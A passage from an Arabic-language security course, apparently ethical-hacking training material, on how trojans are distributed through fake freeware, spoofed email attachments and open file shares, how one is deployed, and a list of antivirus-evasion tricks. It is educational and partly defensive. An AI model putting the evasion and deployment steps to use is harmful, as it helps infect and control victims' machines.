‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻣﻛﻧﮭم ﺑﺳﮭوﻟﺔ إﻏراء اﻟﺿﺣﯾﺔ ﻟﺗﺣﻣﯾل اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ اﻟﺗﻲ ھﻲ ﻣﻧﺎﺳﺑﺔ ﻻﺣﺗﯾﺎﺟﺎﺗﮫ‪ ،‬ﺣﯾث ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣﻊ ﻋدﯾد ﻣن اﻟﻣﻣﯾزات ﻣﺛل‬
‫دﻓﺗر اﻟﻌﻧﺎوﯾن‪ ،‬اﻟوﺻول ﻟﻔﺣص اﻟﻌدﯾد ﻣن ﺣﺳﺎﺑﺎت ‪ ،POP3‬واﻟﻌدﯾد ﻣن اﻟوظﺎﺋف اﻷﺧرى اﻟﺗﻲ ﺗﺟﻌﻠﮫ أﻓﺿل ﻣن ﻋﻣﯾل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‬
‫اﻟﻣﺳﺗﺧدم ﺣﺎﻟﯾﺎ‪.‬‬
‫اﻟﺿﺣﯾﺔ ﯾﻘوم ﺑﺗﺣﻣﯾل اﻟﺑراﻣﺞ وﯾﻌﺗﺑرھﺎ ﺗطﺑﯾﻖ ﻣوﺛوق ﺑﮫ‪ ،‬ﻟذﻟك ﻓﺎن ﺑراﻣﺞ اﻟﺣﻣﺎﯾﺔ ﺗﻔﺷل ﻓﻲ ﺗﻧﺑﯾﮭﮫ ﻋن اﻟﺑراﻣﺞ اﻟﺟدﯾدة اﻟﻣﺳﺗﺧدﻣﺔ‪ .‬ﯾﺗم‬
‫إرﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ وﻛﻠﻣﺎت اﻟﻣرور ﻟﺣﺳﺎب ‪ POP3‬ﻣﺑﺎﺷرة إﻟﻰ ﺻﻧدوق ﺑرﯾد اﻟﻣﮭﺎﺟم ﻣن دون أن ﯾﻼﺣظ أﺣد‪ .‬وﯾﻣﻛن أﯾﺿﺎ أن ﯾرﺳل‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ ﻣؤﻗﺗﺎ وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬اﻟﮭدف ھو ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟواﻓرة وإرﺳﺎﻟﮭﺎ إﻟﻰ اﻟﻣﮭﺎﺟم‪.‬‬
‫ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت‪ ،‬ﻗد ﯾﻣﻠك اﻟﻣﮭﺎﺟﻣﯾن اﻟوﺻول اﻟﻛﺎﻣل إﻟﻰ اﻟﻧظﺎم‪ ،‬وﻟﻛن ﻣﺎ ﯾﻔﻌﻠﮫ اﻟﻣﮭﺎﺟم ﯾﻌﺗﻣد ﻋﻠﻰ أﻓﻛﺎره ﺣول ﻛﯾﻔﯾﺔ اﺳﺗﺧدام وظﺎﺋف‬
‫اﻟﺑراﻣﺞ اﻟﻣﺧﻔﯾﺔ‪ .‬أﺛﻧﺎء إرﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ واﺳﺗﺧدام اﻟﻣﻧﻔذ ‪ 25‬أو ‪ 110‬ﻠﻠ ‪ ،POP3‬ﯾﻣﻛن أن ﺗﺳﺗﺧدم ھذه ﻟﻼﺗﺻﺎل ﻣﻊ آﻟﺔ اﻟﻣﮭﺎﺟم )ﻟﯾس‬
‫ﻓﻲ اﻟﻣﻧزل‪ ،‬ﺑطﺑﯾﻌﺔ اﻟﺣﺎل‪ ،‬وﻟﻛن ﻣن آﻟﺔ اﺧﺗرق آﺧري( ﻟﯾﺗﺻل وﯾﺳﺗﺧدم اﻟوظﺎﺋف اﻟﻣﺧﻔﯾﺔ اﻟﻣﺿﻣﻧﺔ ﻓﻲ اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ‪ .‬اﻟﻔﻛرة ھﻧﺎ ھو ﺗﻘدﯾم‬
‫ﺑرﻧﺎﻣﺞ اﻟذي ﯾﺗطﻠب ﺗﺄﺳﯾس اﺗﺻﺎل ﻣﻊ اﻟﻣﻠﻘم‪.‬‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻌﯾﺷون ﻋﻠﻰ اﻹﺑداع‪ .‬ﯾﻧظر ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ‪ ،fake audio galaxy‬واﻟذي ھو ﻋﺑﺎره ﻋن إﻋطﺎء ﻣوﻗﻊ ﻟﺗﺣﻣﯾل ‪.MP3‬‬
‫اﻟﻣﮭﺎﺟم ﯾﻧﺷﺎ ﻣﺛل ھذه اﻟﻣواﻗﻊ ﺑﺎﺳﺗﺧدام ﻣﺛﻼ ﻣﺳﺎﺣﺔ ‪ 15‬ﻏﯾﻐﺎﺑﺎﯾت ﻋﻠﻰ ﻧظﺎﻣﮫ ﻟوﺿﻊ أرﺷﯾف ﻛﺑﯾر ﻟﻣﻠﻔﺎت ‪ .MP3‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﯾﺗم‬
‫ﺗﻛوﯾن ﺑﻌض اﻷﻧظﻣﺔ اﻷﺧرى أﯾﺿﺎ ﻋﻠﻰ ﻧﻔس اﻟﺷﻛل‪ .‬ﺣﯾث ﯾﺗم اﺳﺗﺧدام ذﻟك ﻟﺧداع اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ اﻟﺗﻔﻛﯾر ﻓﻲ أﻧﮭم ﯾﻘوﻣون ﺑﺎﻟﺗﺣﻣﯾل ﻣن‬
‫ﻏﯾرھم ﻣن اﻟﻧﺎس اﻟذﯾن ﯾﻧﺗﺷرون ﻋﺑر اﻟﺷﺑﻛﺔ‪ .‬ﯾﻌﻣل اﻟﺑرﻧﺎﻣﺞ ك ‪ backdoor‬وﺳوف ﯾﺻﯾب اﻵﻻف ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺳﺎذﺟﯾن اﻟذﯾن‬
‫ﯾﺳﺗﺧدﻣون وﺻﻼت ‪.ADSL‬‬
‫ﺑﻌض اﻟﺑراﻣﺞ اﻟﻣزﯾﻔﺔ ﺗﺣﺗوي ﻋﻠﻰ اﻛواد ﻣﺧﻔﯾﮫ‪ ،‬وﻟﻛﻧﮭﺎ ﻻ ﺗزال ﺗﻣﻠك ﻧظرة اﻻﺣﺗراﻓﯾﺔ‪ .‬ﺣﯾث ھذه اﻟﻣواﻗﻊ ﯾﺗم وﺻﻠﮭﺎ ﺑﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ‬
‫طروادة‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﺧدع اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ اﻟوﺛوق ﺑﮭﺎ‪ .‬ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﻣﻠف ‪ readme.txt‬ﻓﻲ ‪ .setup‬وھذا ﯾﻣﻛن أن ﯾﺧدع أي ﻣﺳﺗﺧدم‬
‫ﺗﻘرﯾﺑﺎ‪ ،‬ﻟذﻟك ﻧﺣﺗﺎج إﻟﻰ ﻋﻧﺎﯾﺔ ﻣﻧﺎﺳﺑﺔ اﻟﺗﻲ ﯾﻧﺑﻐﻲ ﺗﻧﻔﯾذھﺎ ﻷي ﺑراﻣﺞ ﻣﺟﺎﻧﯾﺔ ﻗﺑل ﺗﻧزﯾﻠﮭﺎ‪ .‬ھذا ﻣﮭم ﻷن ھذا اﻷﺳﻠوب اﻟﺧطﯾر ھو وﺳﯾﻠﺔ ﺳﮭﻠﺔ‬
‫ﻟﺗﺻﯾب ﺟﮭﺎز ﻋﺑر أﺣﺻﻧﺔ طروادة اﻟﻣﺧﺑﺄة ﻓﻲ اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ‪.‬‬
‫‪Shrink-Wrapped Software‬‬
‫‪ Legitimate "shrink-wrapped" software‬ﯾﺗم ﺗﻌﺑﺋﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣوظﻔﯾن اﻟﺳﺎﺧطﯾن واﻟﺗﻲ ﯾﻣﻛن أن ﺗﺣﺗوي ﻋﻠﻰ أﺣﺻﻧﺔ طروادة‪.‬‬
‫‪Via Attachments‬‬
‫ﻋﻧد ﯾﺗﻠﻘﻰ ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ رﺳﺎﻟﺔ اﻟﻛﺗروﻧﯾﺔ ﻣﺟﮭوﻟﺔ ﺗﻘول إﻧﮭﺎ ﺳوف ﺗﺣﺻل ﻋﻠﻰ أﻓﻼم اﺑﺎﺣﯾﺔ ﻣﺟﺎﻧﯾﺔ أو ﺣرﯾﺔ اﻟوﺻول إﻟﻰ اﻹﻧﺗرﻧت إذا ﺗم‬
‫ﺗﺷﻐﯾل اﻟﻣرﻓﻖ )ﻣﻠف ‪ ،(exe‬ﺣﯾث أﻧﮭﺎ ﻗد ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻣن دون ﻓﮭم اﻟﺧطر ﻋﻠﻰ اﻷﺟﮭزة اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬
‫اﻷﻣﺛﻠﺔ‪:‬‬
‫‪ -‬ﻟﻧﻔرض ﻣﺛﻼ وﺟود ﻣﺳﺗﺧدم ﻟدﯾﮫ ﺻدﯾﻖ ﺟﯾد اﻟذي ﯾﺣﻣل ﺑﻌض اﻷﺑﺣﺎث وﯾرﯾد أن ﯾﻌرف ﺣول أﺣد اﻟﻣوﺿوﻋﺎت اﻟﻣرﺗﺑطﺔ ﺑﻣﺟﺎل‬
‫ﺻدﯾﻘﮫ ﻣن اﻟﺑﺣوث‪ .‬ﻓﯾﻘوم ﺑﺈرﺳﺎل رﺳﺎﻟﺔ ﺑرﯾد اﻟﻛﺗروﻧﻲ ﻟﺻدﯾﻘﮫ ﯾﺳﺄل ﻋن ھذا اﻟﻣوﺿوع وﯾﻧﺗظر اﻟرد‪ .‬اﻟﻣﮭﺎﺟم ﻗد ﯾﺳﺗﮭدف‬
‫اﻟﻣﺳﺗﺧدم اﻟذي ﯾﻌرف أﯾﺿﺎ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻟﺻدﯾﻘﮫ‪ .‬اﻟﻣﮭﺎﺟم ﺑﺑﺳﺎطﺔ ﯾﻘوم ﺑﺗرﻣﯾز ﺑرﻧﺎﻣﺞ ﻟﺗزﯾف اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‬
‫وﯾﺟﻌﻠﮫ ﯾﺑدو أن اﻟﺻدﯾﻖ ھو اﻟذي ﯾﻘوم ﺑﺎرﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬ﻟﻛﻧﮭﺎ ﺳوف ﺗﺷﻣل ﻋﻠﻰ ﻣرﻓﻖ ﺗروﺟﺎن‪ .‬اﻟﻣﺳﺗﺧدم ﺳوف ﯾﺗﺣﻘﻖ‬
‫ﻣن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬وﯾرى أن ﺻدﯾﻘﮫ ﻗد أﺟﺎب اﻻﺳﺗﻌﻼم ﻟﮫ ﺑﻣرﻓﻖ‪ ،‬ﻓﯾﻘوم ﺑﺗﺣﻣﯾﻠﮫ وﺗﺷﻐﯾﻠﮫ دون اﻟﺗﻔﻛﯾر أﻧﮫ ﻗد ﯾﻛون ﺣﺻﺎن‬
‫طروادة‪ .‬واﻟﻧﺗﯾﺟﺔ اﻟﻧﮭﺎﺋﯾﺔ ھﻲ ﺣدوث اﻟﻌدوى‪.‬‬
‫‪ -‬ارﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ذات اﻟﻌﻧوان "‪ " Microsoft IE Update‬اﻟﻰ ﺳﻠﺔ اﻟﻣﺣذوﻓﺎت‪ ،‬ﻣن دون اﻟﻧظر إﻟﯾﮫ‪.‬‬
‫‪ -‬ﺑﻌض ﻋﻣﻼء اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺛل ﺑرﻧﺎﻣﺞ ‪ ،Outlook Express‬ﻟدﯾﮭﺎ اﻷﺧطﺎء اﻟﺗﻲ ﺗﻘوم ﺑﺗﻧﻔﯾذ اﻟﻣﻠﻔﺎت اﻟﻣرﻓﻘﺔ ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫‪Untrusted Sites and Freeware Software‬‬
‫ھو ﻣوﻗﻊ ﯾﻘﻊ ﻋﻠﻰ ﻣﺳﺎﺣﺔ ﻣﺟﺎﻧﯾﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أو ﻣزود واﺣد ﻓﻘط ﻟﺗﻘدم ﺑراﻣﺞ ﻟﻸﻧﺷطﺔ اﻟﻐﯾر ﻣﺷروﻋﺔ واﻟﺗﻲ ﯾﻣﻛن أن ﺗﻌﺗﺑر‬
‫ﻣﺷﺑوھﺔ‪.‬‬

‫‪505‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ اﻟﻐﯾر ﻣﺷروﻋﮫ )‪ (underground sites‬ﻣﺛل ‪ NeuroticKat‬ﻟﻠﺑرﻣﺟﯾﺎت‪ .‬ﻓﻣن اﻟﺧطورة ﺗﺣﻣﯾل أي ﻣن‬ ‫‪-‬‬
‫اﻟﺑرﻧﺎﻣﺞ أو اﻻدوات اﻟﺗﻲ ﺗﻘﻊ ﻋﻠﻰ ﻣﺛل ھذه اﻟﻣوﻗﻊ اﻟﻣﺷﺑوھﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﺑﻣﺛﺎﺑﺔ ﻗﻧﺎة ﻟﻠﮭﺟوم طروادة ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‬
‫اﻟﺿﺣﯾﺔ‪ .‬ﺑﻐض اﻟﻧظر ﻋﻣﺎ ھﻲ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ‪ ،‬ھل أﻧت ﻋﻠﻰ اﺳﺗﻌداد ﻻﺗﺧﺎذ ھذه اﻟﻣﺧﺎطرة؟‬
‫ﺗﺗوﻓر اﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ اﻟﺗﻲ ﻟدﯾﮭﺎ ﻧظرة اﺣﺗراﻓﯾﮫ وﺗﺣﺗوي ﻋﻠﻰ أرﺷﯾف ﺿﺧم‪ .‬ھذه اﻟﻣواﻗﻊ ﺗﺣﺗوي ﺑﺷﻛل ‪ feedback‬ووﺻﻼت‬ ‫‪-‬‬
‫إﻟﻰ ﻣواﻗﻊ ﺷﻌﺑﯾﺔ أﺧرى‪ .‬ﯾﺟب ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن أﺧذ اﻟوﻗت اﻟﻛﺎﻓﻲ ﻟﻔﺣص ھذه اﻟﻣﻠﻔﺎت ﻗﺑل ﺗﻧزﯾﻠﮭﺎ‪ ،‬ﺑﺣﯾث ﯾﻣﻛن ﺗﺣدﯾد ﻣﺎ إذا ﻛﺎﻧت‬
‫أو ﻟم ﺗﻛن ﺗﺄﺗﻲ ﻣن ﻣوﻗﻊ ﺣﻘﯾﻘﯾﮫ أو ﻣﺷﺑوھﺔ‪.‬‬
‫اﻟﺑرﻣﺟﯾﺎت ﻣﺛل ‪ ،PGP ،ICQ ،mlRC‬أو أي ﺑراﻣﺞ ﺷﻌﺑﯾﺔ أﺧرى ﯾﺟب ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻟﻣوﻗﻊ اﻷﺻﻠﻲ )أو اﻟﻣواﻗﻊ اﻟﻣرﺗﺑطﺔ‬ ‫‪-‬‬
‫اﻟرﺳﻣﯾﺔ(‪ ،‬وﻟﯾس ﻣن أي ﻣن ﻣواﻗﻊ اﻷﺧرى اﻟﺗﻲ ﻗد ﺗﺣﺗوي ﻋﻠﻰ رواﺑط ﻟﺗﻧزﯾل اﻟﺑرﻧﺎﻣﺞ ﻧﻔﺳﮫ‪.‬‬
‫أﺻﺣﺎب اﻟﻣواﻗﻊ اﻟﺧﺎص ﺑﻣوﺿوع اﻷﻣن اﻟﻣﻌروﻓﺔ‪ ،‬واﻟذﯾن ﻟدﯾﮭم ﻣﺣﻔوظﺎت واﺳﻌﺔ ﻣﻊ ﻣﺧﺗﻠف ﺗطﺑﯾﻘﺎت اﻟﻘرﺻﻧﺔ "اﻟﺑراﻣﺞ‪ ،‬ﯾﺟب‬ ‫‪-‬‬
‫أن ﺗﻛون ﻣﺳؤوﻟﺔ ﻋن اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗﻘدﻣﮭﺎ وﯾﺟب ﻓﺣﺻﮭﺎ ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﺑﺎﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ‬
‫ﻣﻛﺎﻓﺣﺔ طروادة ﻟﺿﻣﺎن اﻟﻣوﻗﻊ أن ﯾﻛون " ﺧﺎل ﻣن أﺣﺻﻧﺔ طروادة واﻟﻔﯾروﺳﺎت "‪ .‬ﻟﻧﻔﺗرض ان اﻟﻣﮭﺎﺟم ﯾﻘدم ﺑراﻣﺞ ﻣﺻﺎﺑﮫ‬
‫ﺑطروادة‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،UDP flooder ،‬إﻟﻰ اﻷرﺷﯾف‪ ،‬ﻓﺈذا ﻛﺎن اﻟﻣﺳؤول ﻋن اﻟﻣوﻗﻊ ﻟﯾس ﻓﻲ ﺣﺎﻟﺔ ﺗﺄھب‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم‬
‫ﺳوف ﯾﺳﺗﻔﯾد ﻣن اﻟﻼﻣﺳوؤﻟﯾﺔ ﻟﻠﻣﺳؤول ﻋن اﻟﻣوﻗﻊ ﻟوﺿﻊ ﻣﻠﻔﺎت ﻋﻠﻰ اﻟﻣوﻗﻊ ﻣﻊ ﺗروﺟﺎن‪.‬‬
‫ﯾﺟب ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن اﻟذﯾن ﯾﺗﻌﺎﻣﻠون ﻣﻊ أي ﻧوع ﻣن اﻟﺑراﻣﺞ أو ﺗطﺑﯾﻘﺎت اﻟوﯾب ﻓﺣص اﻧظﻣﺗﮭم ﯾوﻣﯾﺎ‪ .‬إذا ﺣدث اﻟﻛﺷف ﻋن أي‬ ‫‪-‬‬
‫ﻣﻠف ﺟدﯾد‪ ،‬ﯾﺟب ﻓﺣص ذﻟك‪ .‬إذا ﻧﺷﺄ أي اﺷﺗﺑﺎه ﺣول ﻣﻠف‪ ،‬ﻓﺈﻧﮫ ﯾﺟب أن ﺗﺣﺎل ھذه اﻟﺑرﻣﺟﯾﺎت اﻟﻰ ﻣﺧﺗﺑرات اﻟﻛﺷف ﻟﻠﻣزﯾد ﻣن‬
‫اﻟﺗﺣﻠﯾل‪.‬‬
‫ﻣن اﻟﺳﮭل أن ﺗﺻﯾب اﻷﺟﮭزة ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﻣﺟﺎﻧﯾﺔ‪" .‬اﻟﻣﺟﺎﻧﻲ ﻟﯾس داﺋﻣﺎ اﻷﻓﺿل"‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ھذه اﻟﺑراﻣﺞ ﺧطﯾرة ﻋﻠﻰ اﻷﻧظﻣﺔ‪.‬‬ ‫‪-‬‬
‫)‪NetBIOS (File Sharing‬‬
‫إذا ﻛﺎن اﻟﻣﻧﻔذ ‪ 139‬ﻋﻠﻰ اﻟﻧظﺎم ﻣﻔﺗوح‪ ،‬أي‪ ،‬ﯾﺗم ﺗﻣﻛﯾن ﻣﺷﺎرﻛﺔ اﻟﻣﻠﻔﺎت‪ ،‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻵﺧرﯾن ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ ،‬وﺗﺛﺑﯾت‬
‫‪ ،trojan.exe‬وﺗﻌدﯾل اﻟﻣﻠف ﻋﻠﻰ اﻟﻧظﺎم‪.‬‬
‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم أﯾﺿﺎ اﺳﺗﺧدام ھﺟوم ‪ DOS‬ﻹﯾﻘﺎف ﺗﺷﻐﯾل اﻟﻧظﺎم وﻓرض إﻋﺎدة اﻟﺗﺷﻐﯾل‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن طروادة ﯾﻣﻛن إﻋﺎدة ﺗﺷﻐﯾل ﻧﻔﺳﮫ ﻋﻠﻰ‬
‫اﻟﻔور‪ .‬ﻟﻣﻧﻊ ﻣﺷﺎرﻛﺔ اﻟﻣﻠﻔﺎت ﻓﻲ إﺻدار ﻧظﺎم ‪ ،Windows‬اﻧﺗﻘل إﻟﻰ‪:‬‬
‫‪Start Settings  Control Panel  Network  File and Print Sharing‬‬
‫‪Downloading‬‬
‫ﺗﻧزﯾل اﻟﻣﻠﻔﺎت‪ ،‬واﻷﻟﻌﺎب‪ ،‬و‪ screensaver‬ﻣن ﻣواﻗﻊ اﻹﻧﺗرﻧت ﯾﻣﻛن أن ﺗﻛون ﺧطﯾرة‪.‬‬
‫ﻛﯾﻔﯾﺔ ﻧﺷر ﺣﺻﺎن طروادة )‪(How To Deploy a Trojan‬‬
‫اﻟﺗروﺟﺎن ھﻲ اﻟوﺳﯾﻠﺔ اﻟﺗﻲ ﺗﻣﻛن اﻟﻣﮭﺎﺟم ﻣن اﻟوﺻول إﻟﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ .‬ﻣن أﺟل اﻟﺳﯾطرة ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﻧﺷﺄ ﺧﺎدم طروادة‪،‬‬
‫ﺛم ﯾرﺳل رﺳﺎﻟﺔ إﻟﻛﺗروﻧﯾﺔ إﻟﻰ اﻟﺿﺣﯾﺔ ﺗﺣﺗوي ﻋﻠﻰ راﺑط إﻟﻰ ﺧﺎدم طروادة‪ .‬ﺑﻣﺟرد أن ﯾﻧﻘر اﻟﺿﺣﯾﺔ ﻋﻠﻰ اﻟراﺑط اﻟذي أرﺳل اﻟﯾﮫ ﻣن ﻗﺑل‬
‫اﻟﻣﮭﺎﺟم‪ ،‬ﻓﺄﻧﮫ ﯾرﺗﺑط ﻣﺑﺎﺷرة ﻣﻊ ﺧﺎدم طروادة‪ .‬ﺧﺎدم طروادة ﯾرﺳل طروادة ﻟﻧظﺎم اﻟﺿﺣﯾﺔ‪ .‬اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑﯾت طروادة‪ ،‬اﺻﺎﺑﺔ ﺟﮭﺎز‬
‫اﻟﺿﺣﯾﺔ‪ .‬وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﯾﺗم ﺗوﺻﯾل اﻟﺿﺣﯾﺔ إﻟﻰ ﺧﺎدم اﻟﮭﺟوم ﻣﻊ ﻋدم دراﯾﺗﮫ ﺑذﻟك‪ .‬ﺑﻣﺟرد رﺑط اﻟﺿﺣﯾﺔ ﺑﺧﺎدم اﻟﻣﮭﺎﺟم‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻣﻠك‬
‫اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ وﯾﻘوم ﺑﺗﻧﻔﯾذ أي إﺟراء ﯾﺧﺗﺎره اﻟﻣﮭﺎﺟم‪ .‬إذا ﻗﺎم اﻟﺿﺣﯾﺔ ﺑﺎﻟﻘﯾﺎم ﺑﺄي ﺻﻔﻘﺔ ﻋﺑر اﻹﻧﺗرﻧت أو ﻋﻣﻠﯾﺔ ﺷراء‪،‬‬
‫ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﺑﺳﮭوﻟﺔ ﻣﺛل ﺗﻔﺎﺻﯾل ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬وﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎب‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪،‬‬
‫ﯾﻣﻛن أﯾﺿﺎ اﺳﺗﺧدام آﻟﺔ اﻟﺿﺣﯾﺔ ﻛﻣﺻدر ﻟﺷن ھﺟﻣﺎت ﻋﻠﻰ أﻧظﻣﺔ أﺧرى‪.‬‬
‫ﻋﺎدة ﻣﺎ ﯾﺻﺎب أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ ﻧﻘر اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ وﺻﻠﺔ ﺧﺑﯾﺛﺔ أو ﻓﺗﺢ ﻣرﻓﻖ ﺑرﯾد إﻟﻛﺗروﻧﻲ اﻟذي ﯾﺛﺑت ﺣﺻﺎن طروادة ﻋﻠﻰ‬
‫أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﺗﻲ ھﻲ ﺑﻣﺛﺎﺑﺔ ‪ backdoor‬ﻟﻠﻣﺟرﻣﯾن اﻟذﯾن ﯾﻣﻛﻧﮭم ﺑﻌد ذﻟك اﺳﺗﺧدام اﻟﻛﻣﺑﯾوﺗر ﻹرﺳﺎل ﺑرﯾد اﻟﻛﺗروﻧﻲ ﻣﺗطﻔل‪.‬‬

‫‪506‬‬
‫اﻟﺗﮭرب ﻣن ﺗﻘﻧﯾﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت )‪(Evading Antivirus Techniques‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻣﺧﺗﻠف اﻟﺗﻘﻧﯾﺎت اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ ﺗروﺟﺎن واﻟﻔﯾروﺳﺎت و‪ worms‬ﻟﻠﺗﮭرب ﻣن ﻣﻌظم ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪:‬‬
‫ﻻ ﺗﺳﺗﺧدم أﺑدا أﺣﺻﻧﺔ طروادة اﻟﺗﻲ ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﺷﺑﻛﺔ اﻹﻧﺗرﻧت )ﺣﯾث ﯾﺗم ﻛﺷﻔﮭﺎ ﺑﺳﮭوﻟﮫ ﻣن ﻗﺑل ﺑرﻣﺟﯾﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت(‪.‬‬ ‫‪-1‬‬
‫ﯾﻔﺿل ﻛﺗﺎﺑﺔ طروادة اﻟﺧﺎﺻﺔ ﺑك وﺗﺿﻣﯾﻧﮫ داﺧل اﻟﺗطﺑﯾﻘﺎت‪.‬‬ ‫‪-2‬‬
‫ﺗﻐﯾﯾر ﺻﯾﻎ اﻟﺗروﺟﺎن ﻓﻲ‪:‬‬ ‫‪-3‬‬
‫‪Convert an EXE to VB script‬‬
‫‪Convert an EXE to a DOC file‬‬
‫‪Convert an EXE to a PPT file‬‬
‫ﺗﻐﯾﯾر ‪.checksum‬‬ ‫‪-4‬‬
‫ﺗﻐﯾﯾر ﻣﺣﺗوى طروادة ﺑﺎﺳﺗﺧدام ‪.hex editor‬‬ ‫‪-5‬‬
‫ﻛﺳر ﻣﻠف طروادة إﻟﻰ ﻗطﻊ ﻣﺗﻌددة‪.‬‬ ‫‪-6‬‬

‫‪507‬‬
‫)‪ (6.3‬أﻧواع اﻟﺘﺮوﺟﺎن )‪(Type of Trojan‬‬
‫ﺣﺗﻰ اﻵن‪ ،‬ﻟﻘد ﻧﺎﻗﺷﻧﺎ اﻟﻣﻔﺎھﯾم اﻟﻣﺧﺗﻠﻔﺔ ﻋن أﺣﺻﻧﺔ طروادة واﻟطرﯾﻘﺔ اﻟﺗﻲ ﺗﺻﯾب ﺑﮭﺎ اﻟﻧظﺎم‪ .‬اﻵن ﺳوف ﻧﻧﺎﻗش اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ ﻷﺣﺻﻧﺔ‬
‫طروادة اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن ﺧﻼل اﻟوﺳﺎﺋل اﻟﻣﺧﺗﻠﻔﺔ‪.‬‬
‫ﯾﻐطﻲ ھذا اﻟﻘﺳم أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن أﺣﺻﻧﺔ طروادة ﻣﺛل ‪،email Trojans ،document Trojans ،command-shell Trojans‬‬
‫‪ ،proxy server Trojans ،botnet Trojans‬وھﻠم ﺟرا‪.‬‬
‫أﻧواع اﻟﺗروﺟﺎن‬
